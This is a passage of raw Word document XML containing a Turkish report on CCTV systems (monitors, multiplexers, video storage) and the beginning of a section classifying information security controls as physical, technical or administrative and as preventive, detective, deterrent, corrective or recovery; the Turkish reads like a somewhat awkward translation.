          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ini belirler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F"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olor w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaliteli görüntü, monitörün kamera çözünürlüğünü mümkün olduğunca yakından eşleştiriyor; ancak, eğer yakın bir eşleşme yapılmazsa, daha yüksek çözünürlükte bir monitöre sahip olmanın daha iyi olduğu genel olarak kabul edilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bunun nedeni, 300 satır çözünürlükte bir görüntü gösteren 900-satırlık bir monitörün üçlü bir görüntü vermesidir. Her resim satırı için kullanılabilir çizgiler.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resim büyük olacak ve daha az net görünecek; ama daha sonraki bir tarihte Monitör, ekranda birkaç kameradan gelen çıkışı aynı anda görüntülemek için bölünmüş ekran şeklinde kullanılır, her görüntü için yeterli çözünürlük olacaktır. Öte yandan, monitörün çözünürlüğü kamera çözünürlüğünden daha düşükse, tüm görüntü gösterilemediğinden detay kaybedilecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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s="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kullanılacak monitörün boyutu birkaç faktöre dayanmaktadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Görüntülenecek görüntü sayısı arttıkça monitör sayısı da artar. Tek bir monitör, aynı kameradaki birkaç kameradan gelen çıkışı gösterme yeteneğine sahiptir (çoğullayıcılara bakınız), ancak bu görüntüleyici ve monitör arasında rahat bir mesafe gerektirir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>am olarak bilimsel olmasa da, genel bir kural, izleyicinin uzatılmış bir kolun ucundaki yumruklarının görüntüyü örtmesi gerektiğidir. Bu, görüntüleyiciyi tek bir görüntü için monitörden uzağa yerleştirir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>birkaç görüntü gösterildiyse ve daha yakın.</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çevre Birimleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F"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olor w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çoklayıcı, çıkış sinyalini birden fazla kameradan alabilen bir donanım cihazıdır.Bu sinyalleri birkaç şekilde işlemek. En yaygın kullanım, seçilen kameralardan gelen girişleri, giriş grubunun tek bir monitörde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>görüntüleneceği şekilde tek bir çıkışta birleştirmektir. Çoklayıcı, dört ila 32 ayrı sinyali kabul edebilir ve video geliştirme, veri sıkıştırma ve bir depolama aygıtına depolama veya çıkış sağlar.Çoklayıcıda bulunan ek özelliklerden bazıları, hareketi uyarmak için bir görüntü sahnesindeki değişikliği ve analog video sinyallerini dijital formata dönüştürme yeteneğini algılayan alarm modlarını içerir. Bazı çoklayıcıların video depolama yetenekleri vardır, ancak çoğu ayrı bir depolama cihazına gönderilen çıktıları sağlar. Bir CCTV sistemi bir kamera, iletim ortamı ve bir monitör kadar basit olabilir. Eğer gözlem sistemin amacı ise bu iyi olabilir; ancak amaç bir güvenlik sisteminin parçasıysa, yakalanan görüntülerin saklanması ciddi bir husustur. Kameralardan elde edilen çıktılar, yasal işlemlerde neredeyse reddedilemez kanıtlar sağlamak için saklanabilir ve alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F"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olor w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir video depolama kararı verirken çeşitli hususlar vardır. Her şeyden önce istenen kalite Alınan video Verilerin kalitesi her zaman gereken depolama alanı miktarına eşittir. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Depolama aygıtlarındaki birincil fark, verilerin analog veya dijital formatta saklanıp saklanmayacağıdır. Analog seçenekleri temel olarak standart üç çeyrek inç VHS banttan veya daha yüksek kaliteli bir inç banttan oluşur.Analog için miktar ölçüsü, kayıt hızının ve bant uzunluğunun, kaydedilebilecek zaman miktarını belirleyeceği zamandır. Bir kaydın yayılma süresini artırmak için, kasetteki en iyi özelliklerden biri hızlandırılmış kayıttır. Hızlandırılmış video kaset kaydediciler (VCR'ler), kaydedilen saniyedeki kare sayısını (fps) azaltır</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Bu, daha az kasette daha fazla zaman alanına eşittir, ancak görüntüler oynatıldığında bir dizi sıralı hareketsiz görüntü olarak görünecektir. Resimler arasında meydana gelen kritik bir olayın potansiyeli var ve bu sayede açık bir şekilde değerini kaybediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sonuç:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CCTV sistemleri hiçbir şekilde güvenlik garantisi değildir,</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ancak insan davranışları üzerindeki kontrol etkisi kolayca göz ardı edilemez. Bir kameranın sadece varlığı, çalışıp çalışmadığına bakılmaksızın, güvenlik endüstrisinde caydırıcı olarak paha biçilmez olduğu kanıtlanmıştır. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Derinlemesine savunma, bilgi güvenliği endüstrisinin mantrasıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sonuçta en yüksek düzeyde güvence sağlayacak olan birçok koruma katmanının yakınsamasıdır ve bir veri işleme tesisinin fiziksel güvenliği genellikle en zayıf katmandır. Tesisin, verilerin ve kişilerin güvenliğini sağlamak ve politikaların ve prosedürlerin uygulanmasını sağlamak için uygun şekilde uygulanan bir CCTV sistemi ile kıyaslanabilecek çok az şey var.</w:t>
      </w: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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Types of Information Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BE5114" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="7328"/>
          <w:tab w:val="clear" w:pos="8244"/>
          <w:tab w:val="clear" w:pos="9160"/>
          <w:tab w:val="clear" w:pos="10076"/>
          <w:tab w:val="clear" w:pos="10992"/>
          <w:tab w:val="clear" w:pos="11908"/>
          <w:tab w:val="clear" w:pos="12824"/>
          <w:tab w:val="clear" w:pos="13740"/>
          <w:tab w:val="clear" w:pos="14656"/>
          <w:tab w:val="left" w:pos="7815"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgi Türleri Güvenlik kontrolleri)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Özet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgi varlıklarının korunabilmesi, kurumların karşılaşabileceği risklerin en aza indirgenmesi ve iş sürekliliğinin sağlanması, Bilgi Güvenliği Yönetim Sistemlerinin kurumlarda üst yönetim desteğiyle hayata geçirilmesi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yle mümkün olmaktadır. B</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilgi güvenliğinin yüksek seviyede sağlanması ile ilgili olarak literatürdeki mevcut kaynaklar araştırılıp incelendiğinde, kapsamlı ve güncel bir çalışma olmadığı, sunulan çalışmaların yeterli olmadığı, çoğunlukla ticari içerikli veya güvenilir olmayan web sitelerinde yer aldığı ve nasıl korunması gerektiğiyle ilgili kısa bilgilere y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">er verildiği tespit edilmiştir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mevcut bilgi güvenliği standartları ile yeni oluşturulmakta olan bilgi güvenliği standartları da bu çerçevede gözden geçirilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giriş:</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BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Güvenlik genellikle tehlikeden korunma veya emniyet koşulu olarak tanımlanır. Bilgisayar Güvenliği, özellikle, bir sistemdeki verilerin yetkisiz ifşa, değişiklik veya imhaya karşı korunmasıdır. ve bilgisayar sisteminin yetkisiz kullanımı, değiştirilmesi veya hizmet reddine karşı korunması. Bazı bilgisayar güvenlik kontrolleri üretkenliği engellediğinden, güvenlik tipik olarak Güvenlik ve verimlilik arasında tatmin edici bir denge sağlamak için hangi güvenlik uygulayıcılarının, sistem kullanıcılarının ve sistem operasyonlarının ve idari personelin çalıştığı. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgi güvenliği sağlamak için kontroller fiziksel, teknik veya idari olabilir. Bu üç kontrol kategorisi ayrıca önleyici veya dedektif olarak sınıflandırılabilir. Önleyici kontroller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">istenmeyen olayların ortaya çıkmasından kaçının, dedektif kontroller ise meydana geldikten sonra istenmeyen olayları belirlemeye çalışır. Önleyici kontroller, bilgisayar kaynaklarının serbest kullanımını engeller ve bu nedenle yalnızca kullanıcıların kabul etmeye istekli olduğu dereceye uygulanabilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Etkili güvenlik bilinci programları, kullanıcıların bu tür denetimlerin bilgisayar sistemlerine güvenmelerini nasıl sağladığını anlamalarına yardımcı olarak önleyici denetimlere karşı tolerans düzeyini artırmaya yardımcı olabilir. Yaygın dedektif denetimleri denetim izlerini, izinsiz giriş tespit yöntemlerini ve sağlama toplamlarını içerir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Diğer üç kontrol türü önleyici ve dedektif kontrolleri destekler. Genellikle caydırıcı, düzeltici ve kurtarma olarak tanımlanırlar. Caydırıcı kontroller, bireyleri bilişim güvenliği politikalarını veya prosedürlerini kasıtlı olarak ihlal etmekten caydırmak için tasarlanmıştır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Bunlar genellikle yetkisiz faaliyetler veya potansiyel bir davetsiz misafirin güvenliği ihlal etmemesini (örneğin utançtan ağır cezaya kadar uzanan tehditler gibi) tehdit etmeyi </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>etkilemeyen izinsiz faaliyetler veya sonuç tehditlerini gerçekleştirmeyi zorlaştıran veya istenmeyen hale getiren kısıtlamalar şeklindedir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Düzeltici kontroller ya izinsiz faaliyete izin veren koşulları giderir ya da ihlallerden önce oldukları koşullara geri döner. Düzeltici kontrollerin yürütülmesi, değişikliklere neden olabilir. mevcut fiziksel, teknik ve idari kontroller. Kurtarma denetimleri, kayıp bilgi işlem kaynaklarını veya yeteneklerini geri yükler ve kuruluşun güvenlik ihlallerinden kaynaklanan parasal kayıpları kurtarmasına yardımcı olur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Caydırıcı, düzeltici ve kurtarma kontrolleri ana kategorilerde özel durumlar olarak kabul edilir. fiziksel, teknik ve idari kontroller; açıkça önleyici veya dedektif kategorilerine girmiyorlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Örneğin, caydırıcılığın bir önleyici biçimi olduğu söylenebilir, çünkü bir davetsiz misafirin geri dönmesine neden olabilir; ancak caydırıcılık aynı zamanda davetsiz misafirin en çok korktuğu şey olan ihlalleri tespit etmeyi de içerir. Diğer yandan, düzeltici kontroller önleyici ya da dedektif değildir, ancak antivirüs yazılımı bir virüsü yok ettiğinde teknik kontrollerle veya yedekleme sırasında idari kontrollerle açıkça bağlantılıdırlar.Prosedürler zarar görmüş bir veritabanını geri yüklemenizi sağlar. Son olarak, kurtarma kontrolleri ne önleyici ne de dedektif değildir, ancak felaket kurtarma veya acil durum planları olarak idari kontrollere dahil edilir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5114">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
